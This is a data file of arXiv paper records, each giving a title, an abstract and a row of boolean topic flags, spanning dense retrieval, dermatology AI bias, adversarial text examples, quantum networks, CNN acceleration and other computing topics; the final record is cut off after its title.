1304.1522 | Maximum Uncertainty Procedures for Interval-Valued Probability Distributions | Measures of uncertainty and divergence are introduced for interval-valued probability distributions and are shown to have desirable mathematical properties. A maximum uncertainty inference procedure for marginal interval distributions is presented. A technique for reconstruction of interval distributions from projections is developed based on this inference procedure | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | 23,555
2306.10348 | Typo-Robust Representation Learning for Dense Retrieval | Dense retrieval is a basic building block of information retrieval applications. One of the main challenges of dense retrieval in real-world settings is the handling of queries containing misspelled words. A popular approach for handling misspelled queries is minimizing the representation discrepancy between misspelled queries and their pristine ones. Unlike the existing approaches, which only focus on the alignment between misspelled and pristine queries, our method also improves the contrast between each misspelled query and its surrounding queries. To assess the effectiveness of our proposed method, we compare it against the existing competitors using two benchmark datasets and two base encoders. Our method outperforms the competitors in all cases with misspelled queries. Our code and models are available at https://github.com/panuthept/DST-DenseRetrieval. | false | false | false | false | false | true | false | false | true | false | false | false | false | false | false | false | false | false | 374,195 |
2203.08807 | Disparities in Dermatology AI Performance on a Diverse, Curated Clinical
Image Set | Access to dermatological care is a major issue, with an estimated 3 billion people lacking access to care globally. Artificial intelligence (AI) may aid in triaging skin diseases. However, most AI models have not been rigorously assessed on images of diverse skin tones or uncommon diseases. To ascertain potential biases in algorithm performance in this context, we curated the Diverse Dermatology Images (DDI) dataset-the first publicly available, expertly curated, and pathologically confirmed image dataset with diverse skin tones. Using this dataset of 656 images, we show that state-of-the-art dermatology AI models perform substantially worse on DDI, with receiver operator curve area under the curve (ROC-AUC) dropping by 27-36 percent compared to the models' original test results. All the models performed worse on dark skin tones and uncommon diseases, which are represented in the DDI dataset. Additionally, we find that dermatologists, who typically provide visual labels for AI training and test datasets, also perform worse on images of dark skin tones and uncommon diseases compared to ground truth biopsy annotations. Finally, fine-tuning AI models on the well-characterized and diverse DDI images closed the performance gap between light and dark skin tones. Moreover, algorithms fine-tuned on diverse skin tones outperformed dermatologists on identifying malignancy on images of dark skin tones. Our findings identify important weaknesses and biases in dermatology AI that need to be addressed to ensure reliable application to diverse patients and diseases. | false | false | false | false | true | false | true | false | false | false | false | true | false | false | false | false | false | false | 285,916 |
2501.01097 | EliGen: Entity-Level Controlled Image Generation with Regional Attention | Recent advancements in diffusion models have significantly advanced text-to-image generation, yet global text prompts alone remain insufficient for achieving fine-grained control over individual entities within an image. To address this limitation, we present EliGen, a novel framework for Entity-level controlled image Generation. Firstly, we put forward regional attention, a mechanism for diffusion transformers that requires no additional parameters, seamlessly integrating entity prompts and arbitrary-shaped spatial masks. By contributing a high-quality dataset with fine-grained spatial and semantic entity-level annotations, we train EliGen to achieve robust and accurate entity-level manipulation, surpassing existing methods in both spatial precision and image quality. Additionally, we propose an inpainting fusion pipeline, extending its capabilities to multi-entity image inpainting tasks. We further demonstrate its flexibility by integrating it with other open-source models such as IP-Adapter, In-Context LoRA and MLLM, unlocking new creative possibilities. The source code, model, and dataset are published at https://github.com/modelscope/DiffSynth-Studio.git. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 521,921 |
1712.06751 | HotFlip: White-Box Adversarial Examples for Text Classification | We propose an efficient method to generate white-box adversarial examples to trick a character-level neural classifier. We find that only a few manipulations are needed to greatly decrease the accuracy. Our method relies on an atomic flip operation, which swaps one token for another, based on the gradients of the one-hot input vectors. Due to efficiency of our method, we can perform adversarial training which makes the model more robust to attacks at test time. With the use of a few semantics-preserving constraints, we demonstrate that HotFlip can be adapted to attack a word-level classifier as well. | false | false | false | false | false | false | true | false | true | false | false | false | false | false | false | false | false | false | 86,928 |
1602.01366 | Semantic Acyclicity Under Constraints | A conjunctive query (CQ) is semantically acyclic if it is equivalent to an acyclic one. Semantic acyclicity has been studied in the constraint-free case, and deciding whether a query enjoys this property is NP-complete. However, in case the database is subject to constraints such as tuple-generating dependencies (tgds) that can express, e.g., inclusion dependencies, or equality-generating dependencies (egds) that capture, e.g., functional dependencies, a CQ may turn out to be semantically acyclic under the constraints while not semantically acyclic in general. This opens avenues to new query optimization techniques. In this paper we initiate and develop the theory of semantic acyclicity under constraints. More precisely, we study the following natural problem: Given a CQ and a set of constraints, is the query semantically acyclic under the constraints, or, in other words, is the query equivalent to an acyclic one over all those databases that satisfy the set of constraints? We show that, contrary to what one might expect, decidability of CQ containment is a necessary but not sufficient condition for the decidability of semantic acyclicity. In particular, we show that semantic acyclicity is undecidable in the presence of full tgds (i.e., Datalog rules). In view of this fact, we focus on the main classes of tgds for which CQ containment is decidable, and do not capture the class of full tgds, namely guarded, non-recursive and sticky tgds. For these classes we show that semantic acyclicity is decidable, and its complexity coincides with the complexity of CQ containment. In the case of egds, we show that for keys over unary and binary predicates semantic acyclicity is decidable (NP-complete). We finally consider the problem of evaluating a semantically acyclic query over a database that satisfies a set of constraints; for guarded tgds and functional dependencies this problem is tractable. | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | true | true | 51,690 |
2412.03801 | Agent AI with LangGraph: A Modular Framework for Enhancing Machine
Translation Using Large Language Models | This paper explores the transformative role of Agent AI and LangGraph in advancing the automation and effectiveness of machine translation (MT). Agents are modular components designed to perform specific tasks, such as translating between particular languages, with specializations like TranslateEnAgent, TranslateFrenchAgent, and TranslateJpAgent for English, French, and Japanese translations, respectively. These agents leverage the powerful semantic capabilities of large language models (LLMs), such as GPT-4o, to ensure accurate, contextually relevant translations while maintaining modularity, scalability, and context retention. LangGraph, a graph-based framework built on LangChain, simplifies the creation and management of these agents and their workflows. It supports dynamic state management, enabling agents to maintain dialogue context and automates complex workflows by linking agents and facilitating their collaboration. With flexibility, open-source community support, and seamless integration with LLMs, LangGraph empowers agents to deliver high-quality translations. Together, Agent AI and LangGraph create a cohesive system where LangGraph orchestrates agent interactions, ensuring that user inputs are analyzed, routed, and processed efficiently. Experimental results demonstrate the potential of this system to enhance multilingual translation accuracy and scalability. By highlighting modular design and automated workflows, this paper sets the stage for further innovations in intelligent machine translation services. | false | false | false | false | true | false | false | false | true | false | false | false | false | false | false | false | false | false | 514,111 |
2312.07580 | COVID-19 Detection Using Slices Processing Techniques and a Modified
Xception Classifier from Computed Tomography Images | This paper extends our previous method for COVID-19 diagnosis, proposing an enhanced solution for detecting COVID-19 from computed tomography (CT) images. To decrease model misclassifications, two key steps of image processing were employed. Firstly, the uppermost and lowermost slices were removed, preserving sixty percent of each patient's slices. Secondly, all slices underwent manual cropping to emphasize the lung areas. Subsequently, resized CT scans (224 by 224) were input into an Xception transfer learning model. Leveraging Xception's architecture and pre-trained weights, the modified model achieved binary classification. Promising results on the COV19-CT database showcased higher validation accuracy and macro F1 score at both the slice and patient levels compared to our previous solution and alternatives on the same dataset. | false | false | false | false | false | false | true | false | false | false | false | true | false | false | false | false | false | false | 414,983 |
2311.09553 | Program-Aided Reasoners (better) Know What They Know | Prior work shows that program-aided reasoning, in which large language models (LLMs) are combined with programs written in programming languages such as Python, can significantly improve accuracy on various reasoning tasks. However, while accuracy is essential, it is also important for such reasoners to "know what they know", which can be quantified through the calibration of the model. In this paper, we compare the calibration of Program Aided Language Models (PAL) and text-based Chain-of-thought (COT) prompting techniques over 5 datasets and 2 model types: LLaMA models and OpenAI models. Our results indicate that PAL leads to improved calibration in 75% of the instances. Our analysis uncovers that prompting styles that produce lesser diversity in generations also have more calibrated results, and thus we also experiment with inducing lower generation diversity using temperature scaling and find that for certain temperatures, PAL is not only more accurate but is also more calibrated than COT. Overall, we demonstrate that, in the majority of cases, program-aided reasoners better know what they know than text-based counterparts. | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | 408,177 |
2203.13248 | Pastiche Master: Exemplar-Based High-Resolution Portrait Style Transfer | Recent studies on StyleGAN show high performance on artistic portrait generation by transfer learning with limited data. In this paper, we explore more challenging exemplar-based high-resolution portrait style transfer by introducing a novel DualStyleGAN with flexible control of dual styles of the original face domain and the extended artistic portrait domain. Different from StyleGAN, DualStyleGAN provides a natural way of style transfer by characterizing the content and style of a portrait with an intrinsic style path and a new extrinsic style path, respectively. The delicately designed extrinsic style path enables our model to modulate both the color and complex structural styles hierarchically to precisely pastiche the style example. Furthermore, a novel progressive fine-tuning scheme is introduced to smoothly transform the generative space of the model to the target domain, even with the above modifications on the network architecture. Experiments demonstrate the superiority of DualStyleGAN over state-of-the-art methods in high-quality portrait style transfer and flexible style control. | false | false | false | false | false | false | true | false | false | false | false | true | false | false | false | false | false | false | 287,555 |
2502.04770 | Efficient Evaluation of Quantization-Effects in Neural Codecs | Neural codecs, comprising an encoder, quantizer, and decoder, enable signal transmission at exceptionally low bitrates. Training these systems requires techniques like the straight-through estimator, soft-to-hard annealing, or statistical quantizer emulation to allow a non-zero gradient across the quantizer. Evaluating the effect of quantization in neural codecs, like the influence of gradient passing techniques on the whole system, is often costly and time-consuming due to training demands and the lack of affordable and reliable metrics. This paper proposes an efficient evaluation framework for neural codecs using simulated data with a defined number of bits and low-complexity neural encoders/decoders to emulate the non-linear behavior in larger networks. Our system is highly efficient in terms of training time and computational and hardware requirements, allowing us to uncover distinct behaviors in neural codecs. We propose a modification to stabilize training with the straight-through estimator based on our findings. We validate our findings against an internal neural audio codec and against the state-of-the-art descript-audio-codec. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 531,313 |
2409.07712 | Virtual Node Generation for Node Classification in Sparsely-Labeled
Graphs | In the broader machine learning literature, data-generation methods demonstrate promising results by generating additional informative training examples via augmenting sparse labels. Such methods are less studied in graphs due to the intricate dependencies among nodes in complex topology structures. This paper presents a novel node generation method that infuses a small set of high-quality synthesized nodes into the graph as additional labeled nodes to optimally expand the propagation of labeled information. By simply infusing additional nodes, the framework is orthogonal to the graph learning and downstream classification techniques, and thus is compatible with most popular graph pre-training (self-supervised learning), semi-supervised learning, and meta-learning methods. The contribution lies in designing the generated node set by solving a novel optimization problem. The optimization places the generated nodes in a manner that: (1) minimizes the classification loss to guarantee training accuracy and (2) maximizes label propagation to low-confidence nodes in the downstream task to ensure high-quality propagation. Theoretically, we show that the above dual optimization maximizes the global confidence of node classification. Our experiments demonstrate statistically significant performance improvements over 14 baselines on 10 publicly available datasets. | false | false | false | true | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 487,625 |
2209.07587 | Theoretical Insight into Batch Normalization: Data Dependant Auto-Tuning
of Regularization Rate | Batch normalization is widely used in deep learning to normalize intermediate activations. Deep networks suffer from notoriously increased training complexity, mandating careful initialization of weights, lower learning rates, etc. These issues have been addressed by Batch Normalization (\textbf{BN}), which normalizes the inputs of activations to zero mean and unit standard deviation. Making batch normalization part of the training process dramatically accelerates the training of very deep networks. An active line of research examines the exact theoretical explanation behind the success of \textbf{BN}. Most of these theoretical insights attempt to explain the benefits of \textbf{BN} through its influence on optimization, weight scale invariance, and regularization. Despite \textbf{BN}'s undeniable success in accelerating generalization, an analytical link between the effect of \textbf{BN} and the regularization parameter is still missing. This paper aims to bring out the data-dependent auto-tuning of the regularization parameter by \textbf{BN}, with analytical proofs. We pose \textbf{BN} as a constrained optimization imposed on non-\textbf{BN} weights, through which we demonstrate its data-statistics-dependent auto-tuning of the regularization parameter. We also give an analytical proof of its behavior under a noisy input scenario, which reveals the signal-versus-noise tuning of the regularization parameter. We substantiate our claims with empirical results from MNIST dataset experiments. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 317,803 |
0710.3502 | Using Synchronic and Diachronic Relations for Summarizing Multiple
Documents Describing Evolving Events | In this paper we present a fresh look at the problem of summarizing evolving events from multiple sources. After a discussion concerning the nature of evolving events we introduce a distinction between linearly and non-linearly evolving events. We present then a general methodology for the automatic creation of summaries from evolving events. At its heart lie the notions of Synchronic and Diachronic cross-document Relations (SDRs), whose aim is the identification of similarities and differences between sources, from a synchronical and diachronical perspective. SDRs do not connect documents or textual elements found therein, but structures one might call messages. Applying this methodology will yield a set of messages and relations, SDRs, connecting them, that is a graph which we call grid. We will show how such a grid can be considered as the starting point of a Natural Language Generation System. The methodology is evaluated in two case-studies, one for linearly evolving events (descriptions of football matches) and another one for non-linearly evolving events (terrorist incidents involving hostages). In both cases we evaluate the results produced by our computational systems. | false | false | false | false | false | true | false | false | true | false | false | false | false | false | false | false | false | false | 799 |
2110.11679 | Depth-only Object Tracking | Depth (D) indicates occlusion and is less sensitive to illumination changes, which makes depth an attractive modality for Visual Object Tracking (VOT). Depth is used in RGBD object tracking, where the best trackers are deep RGB trackers with additional heuristics using depth maps. There are two potential reasons for the heuristics: 1) the lack of large RGBD tracking datasets to train deep RGBD trackers and 2) the long-term evaluation protocol of VOT RGBD that benefits from heuristics such as depth-based occlusion detection. In this work, we study how far D-only tracking can go if trained with large amounts of depth data. To compensate for the lack of depth data, we generate depth maps for tracking. We train a "Depth-DiMP" from scratch with the generated data and fine-tune it with the available small RGBD tracking datasets. The depth-only DiMP achieves good accuracy in depth-only tracking, and combined with the original RGB DiMP, the end-to-end trained RGBD-DiMP outperforms the recent VOT 2020 RGBD winners. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 262,571 |
2407.17195 | Surrogate-guided optimization in quantum networks | We propose an optimization algorithm to improve the design and performance of quantum communication networks. When physical architectures become too complex for analytical methods, numerical simulation becomes essential to study quantum network behavior. Although highly informative, these simulations involve complex numerical functions without known analytical forms, making traditional optimization techniques that assume continuity, differentiability, or convexity inapplicable. Additionally, quantum network simulations are computationally demanding, rendering global approaches like Simulated Annealing or genetic algorithms, which require extensive function evaluations, impractical. We introduce a more efficient optimization workflow using machine learning models, which serve as surrogates for a given objective function. We demonstrate the effectiveness of our approach by applying it to three well-known optimization problems in quantum networking: quantum memory allocation for multiple network nodes, tuning an experimental parameter in all physical links of a quantum entanglement switch, and finding efficient protocol settings within a large asymmetric quantum network. The solutions found by our algorithm consistently outperform those obtained with our baseline approaches -- Simulated Annealing and Bayesian optimization -- in the allotted time limit by up to 18\% and 20\%, respectively. Our framework thus allows for more comprehensive quantum network studies, integrating surrogate-assisted optimization with existing quantum network simulators. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 475,881 |
2305.16971 | Theoretical and Practical Perspectives on what Influence Functions Do | Influence functions (IF) have been seen as a technique for explaining model predictions through the lens of the training data. Their utility is assumed to be in identifying training examples "responsible" for a prediction so that, for example, correcting a prediction is possible by intervening on those examples (removing or editing them) and retraining the model. However, recent empirical studies have shown that the existing methods of estimating IF predict the leave-one-out-and-retrain effect poorly. In order to understand the mismatch between the theoretical promise and the practical results, we analyse five assumptions made by IF methods which are problematic for modern-scale deep neural networks and which concern convexity, numeric stability, training trajectory and parameter divergence. This allows us to clarify what can be expected theoretically from IF. We show that while most assumptions can be addressed successfully, the parameter divergence poses a clear limitation on the predictive power of IF: influence fades over training time even with deterministic training. We illustrate this theoretical result with BERT and ResNet models. Another conclusion from the theoretical analysis is that IF are still useful for model debugging and correcting even though some of the assumptions made in prior work do not hold: using natural language processing and computer vision tasks, we verify that mis-predictions can be successfully corrected by taking only a few fine-tuning steps on influential examples. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 368,350 |
2204.00448 | Zero-Shot Cross-lingual Aphasia Detection using Automatic Speech
Recognition | Aphasia is a common speech and language disorder, typically caused by a brain injury or a stroke, that affects millions of people worldwide. Detecting and assessing Aphasia in patients is a difficult, time-consuming process, and numerous attempts to automate it have been made, the most successful using machine learning models trained on aphasic speech data. Like in many medical applications, aphasic speech data is scarce and the problem is exacerbated in so-called "low resource" languages, which are, for this task, most languages excluding English. We attempt to leverage available data in English and achieve zero-shot aphasia detection in low-resource languages such as Greek and French, by using language-agnostic linguistic features. Current cross-lingual aphasia detection approaches rely on manually extracted transcripts. We propose an end-to-end pipeline using pre-trained Automatic Speech Recognition (ASR) models that share cross-lingual speech representations and are fine-tuned for our desired low-resource languages. To further boost our ASR model's performance, we also combine it with a language model. We show that our ASR-based end-to-end pipeline offers comparable results to previous setups using human-annotated transcripts. | false | false | false | false | true | false | true | false | true | false | false | false | false | false | false | false | false | false | 289,258 |
cs/0204047 | Sampling Strategies for Mining in Data-Scarce Domains | Data mining has traditionally focused on the task of drawing inferences from large datasets. However, many scientific and engineering domains, such as fluid dynamics and aircraft design, are characterized by scarce data, due to the expense and complexity of associated experiments and simulations. In such data-scarce domains, it is advantageous to focus the data collection effort on only those regions deemed most important to support a particular data mining objective. This paper describes a mechanism that interleaves bottom-up data mining, to uncover multi-level structures in spatial data, with top-down sampling, to clarify difficult decisions in the mining process. The mechanism exploits relevant physical properties, such as continuity, correspondence, and locality, in a unified framework. This leads to effective mining and sampling decisions that are explainable in terms of domain knowledge and data characteristics. This approach is demonstrated in two diverse applications -- mining pockets in spatial data, and qualitative determination of Jordan forms of matrices. | false | true | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | 537,558 |
2501.10835 | Anatomy of a Historic Blackout: Decoding Spatiotemporal Dynamics of
Power Outages and Disparities During Hurricane Beryl | This study investigates the spatial patterns and temporal variations in outage duration, intensity, and restoration/recovery following the 2024 Hurricane Beryl in Houston, Texas. This historic blackout caused widespread power disruptions across the Houston metropolitan area, leaving more than 2 million customers without power over several days, resulting in more than 143 million total customer-out hours. The findings reveal that areas with higher population density and proximity to the hurricane's path experienced more severe initial impacts. Regions with higher median income showed faster recovery, while lower-income areas exhibited prolonged restoration periods, even with favorable infrastructural conditions, suggesting disparities in restoration speed. The study also highlights how urban development features, such as road density and land elevation, explain spatial disparities in power outage impacts and recovery. This research advances the understanding of power outage dynamics in large metropolitan regions through four key contributions: (1) empirical characterization of outages from a historic hurricane, highlighting infrastructure vulnerabilities in a high-density urban context; (2) comprehensive analysis using multiple metrics to capture spatiotemporal dynamics of outages and restoration; (3) leveraging of high-resolution outage data at fine geographic scales and frequent intervals to quantify and reveal previously masked spatial disparities; and (4) systematic examination of socioeconomic, urban development, and environmental factors in shaping disparities in outage impacts and recovery timelines. These findings provide infrastructure managers, operators, utilities, and decision-makers with crucial empirical insights to quantify power outage impacts, justify resilience investments, and address vulnerability and equity issues in the power infrastructure during hazard events. | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | 525,679 |
2011.12262 | Model Elicitation through Direct Questioning | The future will be replete with scenarios where humans and robots will be working together in complex environments. Teammates interact, and the robot's interaction has to be about getting useful information about the human's (teammate's) model. There are many challenges before a robot can interact, such as incorporating the structural differences in the human's model, ensuring simpler responses, etc. In this paper, we investigate how a robot can interact to localize the human model from a set of models. We show how to generate questions to refine the robot's understanding of the teammate's model. We evaluate the method in various planning domains. The evaluation shows that these questions can be generated offline, and can help refine the model through simple answers. | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | 208,106 |
2310.11960 | Fast Multipole Attention: A Divide-and-Conquer Attention Mechanism for
Long Sequences | Transformer-based models have achieved state-of-the-art performance in many areas. However, the quadratic complexity of self-attention with respect to the input length hinders the applicability of Transformer-based models to long sequences. To address this, we present Fast Multipole Attention, a new attention mechanism that uses a divide-and-conquer strategy to reduce the time and memory complexity of attention for sequences of length $n$ from $\mathcal{O}(n^2)$ to $\mathcal{O}(n \log n)$ or $O(n)$, while retaining a global receptive field. The hierarchical approach groups queries, keys, and values into $\mathcal{O}( \log n)$ levels of resolution, where groups at greater distances are increasingly larger in size and the weights to compute group quantities are learned. As such, the interaction between tokens far from each other is considered in lower resolution in an efficient hierarchical manner. The overall complexity of Fast Multipole Attention is $\mathcal{O}(n)$ or $\mathcal{O}(n \log n)$, depending on whether the queries are down-sampled or not. This multi-level divide-and-conquer strategy is inspired by fast summation methods from $n$-body physics and the Fast Multipole Method. We perform evaluation on autoregressive and bidirectional language modeling tasks and compare our Fast Multipole Attention model with other efficient attention variants on medium-size datasets. We find empirically that the Fast Multipole Transformer performs much better than other efficient transformers in terms of memory size and accuracy. The Fast Multipole Attention mechanism has the potential to empower large language models with much greater sequence lengths, taking the full context into account in an efficient, naturally hierarchical manner during training and when generating long sequences. | false | false | false | false | false | false | true | false | true | false | false | false | false | false | false | false | false | false | 400,850 |
2401.11940 | Low-Tubal-Rank Tensor Recovery via Factorized Gradient Descent | This paper considers the problem of recovering a tensor with an underlying low-tubal-rank structure from a small number of corrupted linear measurements. Traditional approaches tackling such a problem require the computation of the tensor Singular Value Decomposition (t-SVD), which is a computationally intensive process, rendering them impractical for large-scale tensors. Aiming to address this challenge, we propose an efficient and effective low-tubal-rank tensor recovery method based on a factorization procedure akin to the Burer-Monteiro (BM) method. Precisely, our fundamental approach involves decomposing a large tensor into two smaller factor tensors, followed by solving the problem through factorized gradient descent (FGD). This strategy eliminates the need for t-SVD computation, thereby reducing computational costs and storage requirements. We provide rigorous theoretical analysis to ensure the convergence of FGD under both noise-free and noisy situations. Additionally, it is worth noting that our method does not require precise estimation of the tensor tubal-rank. Even in cases where the tubal-rank is slightly overestimated, our approach continues to demonstrate robust performance. A series of experiments has been carried out to demonstrate that, compared to other popular methods, our approach exhibits superior performance in multiple scenarios, in terms of faster computational speed and smaller convergence error. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 423,207
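The factorization idea is easiest to see in the matrix analogue of the tubal-rank case: recover a low-rank matrix by gradient descent on two small factors, never computing an SVD. Below is a hedged NumPy sketch; the names `L`, `R`, the step size, and the full-observation least-squares setting are illustrative choices, not the paper's t-product algorithm.

```python
import numpy as np

rng = np.random.default_rng(1)
n, r = 30, 2
# Ground-truth rank-r matrix; measurements here are simply all entries
M = rng.normal(size=(n, r)) @ rng.normal(size=(r, n))

# Burer-Monteiro-style factorization X = L @ R, optimized by plain
# gradient descent on the least-squares residual (no SVD anywhere)
L = rng.normal(scale=0.1, size=(n, r))
R = rng.normal(scale=0.1, size=(r, n))
lr = 0.005
for _ in range(3000):
    E = L @ R - M    # residual
    gL = E @ R.T     # gradient of 0.5*||LR - M||_F^2 w.r.t. L
    gR = L.T @ E     # gradient w.r.t. R
    L -= lr * gL
    R -= lr * gR

err = np.linalg.norm(L @ R - M) / np.linalg.norm(M)
print(f"relative error: {err:.2e}")
```

Storing `L` and `R` costs $O(nr)$ instead of $O(n^2)$, which is the cost/storage advantage the abstract claims for the tensor version.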
2303.14639 | CRRS: Concentric Rectangles Regression Strategy for Multi-point
Representation on Fisheye Images | Modern object detectors take advantage of rectangular bounding boxes as a conventional way to represent objects. When it comes to fisheye images, rectangular boxes involve more background noise rather than semantic information. Although multi-point representation has been proposed, both its regression accuracy and convergence remain inferior to the widely used rectangular boxes. In order to further exploit the advantages of multi-point representation for distorted images, the Concentric Rectangles Regression Strategy (CRRS) is proposed in this work. We adopt a smoother mean loss to allocate weights and discuss the effect of hyper-parameters on prediction results. Moreover, an accurate pixel-level method is designed to obtain irregular IoU for estimating detector performance. Compared with previous work on multi-point representation, the experiments show that CRRS can improve training performance in both accuracy and stability. We also prove that a multi-task weighting strategy facilitates the regression process in this design. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 354,182
1402.5043 | A logical model of Theory of Mind for virtual agents in the context of
job interview simulation | Job interview simulation with virtual agents aims at improving people's social skills and supporting professional inclusion. In such simulators, the virtual agent must be capable of representing and reasoning about the user's mental state based on social cues that inform the system about his/her affects and social attitude. In this paper, we propose a formal model of Theory of Mind (ToM) for virtual agents in the context of human-agent interaction that focuses on the affective dimension. It relies on a hybrid ToM that combines the two major paradigms of the domain. Our framework is based on modal logic and inference rules about the mental states, emotions and social relations of both actors. Finally, we present preliminary results regarding the impact of such a model on natural interaction in the context of job interview simulation. | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | 31,017
2104.05541 | Optimizing the Whole-life Cost in End-to-end CNN Acceleration | The acceleration of CNNs has gained increasing attention since their success in computer vision. With the heterogeneous functional layers that cannot be processed by the accelerators proposed for convolution layers only, modern end-to-end CNN acceleration solutions either transform the diverse computation into matrix/vector arithmetic, which loses data reuse opportunities in convolution, or introduce a dedicated functional unit for each kind of layer, which results in underutilization and high update expense. To enhance whole-life cost efficiency, we need an acceleration solution that is efficient in processing CNN layers and has the generality to apply to all kinds of existing and emerging layers. To this end, we propose GCONV Chain, a method to convert the entire CNN computation into a chain of standard general convolutions (GCONV) that can be efficiently processed by existing CNN accelerators. This paper comprehensively analyzes the GCONV Chain model and proposes a full-stack implementation to support GCONV Chain. On one hand, the results on seven various CNNs demonstrate that GCONV Chain improves the performance and energy efficiency of existing CNN accelerators by an average of 3.4x and 3.2x respectively. On the other hand, we show that GCONV Chain provides low whole-life costs for CNN acceleration, including both developer efforts and total cost of ownership for the users. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | true | 229,766
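The core claim here, that heterogeneous layers can be re-expressed as standard convolutions, can be sanity-checked with the textbook special case: a fully-connected layer is exactly a 1x1 convolution applied to a 1x1 feature map. A small NumPy sketch (the helper `conv2d_1x1` is illustrative, not the paper's GCONV formulation):

```python
import numpy as np

def conv2d_1x1(x, w):
    """1x1 convolution: x has shape (C_in, H, W), w has shape (C_out, C_in)."""
    return np.einsum('oc,chw->ohw', w, x)

rng = np.random.default_rng(2)
c_in, c_out = 8, 4
w = rng.normal(size=(c_out, c_in))
feat = rng.normal(size=(c_in,))  # input vector to a fully-connected layer

fc_out = w @ feat                # the FC layer's output
# The same weights, viewed as a 1x1 conv over a 1x1 spatial map
conv_out = conv2d_1x1(feat.reshape(c_in, 1, 1), w).reshape(c_out)

print(np.allclose(fc_out, conv_out))  # True
```

Rewrites of this flavor (FC, pooling, element-wise ops as convolutions) let a single convolution engine process the whole network, which is the motivation the abstract gives for GCONV Chain.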
2412.07594 | RFL: Simplifying Chemical Structure Recognition with Ring-Free Language | The primary objective of Optical Chemical Structure Recognition is to identify chemical structure images into corresponding markup sequences. However, the complex two-dimensional structures of molecules, particularly those with rings and multiple branches, present significant challenges for current end-to-end methods to learn one-dimensional markup directly. To overcome this limitation, we propose a novel Ring-Free Language (RFL), which utilizes a divide-and-conquer strategy to describe chemical structures in a hierarchical form. RFL allows complex molecular structures to be decomposed into multiple parts, ensuring both uniqueness and conciseness while enhancing readability. This approach significantly reduces the learning difficulty for recognition models. Leveraging RFL, we propose a universal Molecular Skeleton Decoder (MSD), which comprises a skeleton generation module that progressively predicts the molecular skeleton and individual rings, along with a branch classification module for predicting branch information. Experimental results demonstrate that the proposed RFL and MSD can be applied to various mainstream methods, achieving superior performance compared to state-of-the-art approaches in both printed and handwritten scenarios. The code is available at https://github.com/JingMog/RFL-MSD. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 515,729 |
2410.03333 | Comparative Analysis and Ensemble Enhancement of Leading CNN
Architectures for Breast Cancer Classification | This study introduces a novel and accurate approach to breast cancer classification using histopathology images. It systematically compares leading Convolutional Neural Network (CNN) models across varying image datasets, identifies their optimal hyperparameters, and ranks them based on classification efficacy. To maximize classification accuracy for each model, we explore the effects of data augmentation, alternative fully-connected layers, and model training hyperparameter settings, as well as the advantages of retraining models versus using pre-trained weights. Our methodology includes several original concepts, including serializing generated datasets to ensure consistent data conditions across training runs and significantly reducing training duration. Combined with automated curation of results, this enabled the exploration of over 2,000 training permutations -- such a comprehensive comparison is as yet unprecedented. Our findings establish the settings required to achieve exceptional classification accuracy for standalone CNN models and rank them by model efficacy. Based on these results, we propose ensemble architectures that stack three high-performing standalone CNN models together with diverse classifiers, resulting in improved classification accuracy. The ability to systematically run so many model permutations to find the best outcomes yields very high-quality results, including 99.75% for BreakHis x40 and BreakHis x200 and 95.18% for the Bach datasets when split into train, validation and test datasets. The Bach Online blind challenge yielded 89% using this approach. Whilst this study is based on breast cancer histopathology image datasets, the methodology is equally applicable to other medical image datasets. | false | false | false | false | true | false | false | false | false | false | false | true | false | false | false | false | false | false | 494,735
2003.05218 | Keyfilter-Aware Real-Time UAV Object Tracking | Correlation filter-based tracking has been widely applied in unmanned aerial vehicles (UAVs) with high efficiency. However, it has two imperfections, i.e., boundary effect and filter corruption. Several methods enlarging the search area can mitigate the boundary effect, yet introduce undesired background distraction. Existing frame-by-frame context learning strategies for repressing background distraction nevertheless lower the tracking speed. Inspired by keyframe-based simultaneous localization and mapping, the keyfilter is proposed in visual tracking for the first time, in order to handle the above issues efficiently and effectively. Keyfilters generated by periodically selected keyframes learn the context intermittently and are used to restrain the learning of filters, so that 1) context awareness can be transmitted to all the filters via keyfilter restriction, and 2) filter corruption can be repressed. Compared to the state-of-the-art results, our tracker performs better on two challenging benchmarks, with enough speed for UAV real-time applications. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 167,807
2111.06762 | Diversity-Promoting Human Motion Interpolation via Conditional
Variational Auto-Encoder | In this paper, we present a deep generative model based method to generate diverse human motion interpolation results. We resort to the Conditional Variational Auto-Encoder (CVAE) to learn human motion conditioned on a pair of given start and end motions, by leveraging the Recurrent Neural Network (RNN) structure for both the encoder and the decoder. Additionally, we introduce a regularization loss to further promote sample diversity. Once trained, our method is able to generate multiple plausible coherent motions by repetitively sampling from the learned latent space. Experiments on the publicly available dataset demonstrate the effectiveness of our method, in terms of sample plausibility and diversity. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 266,167 |
2308.08482 | Benign Shortcut for Debiasing: Fair Visual Recognition via Intervention
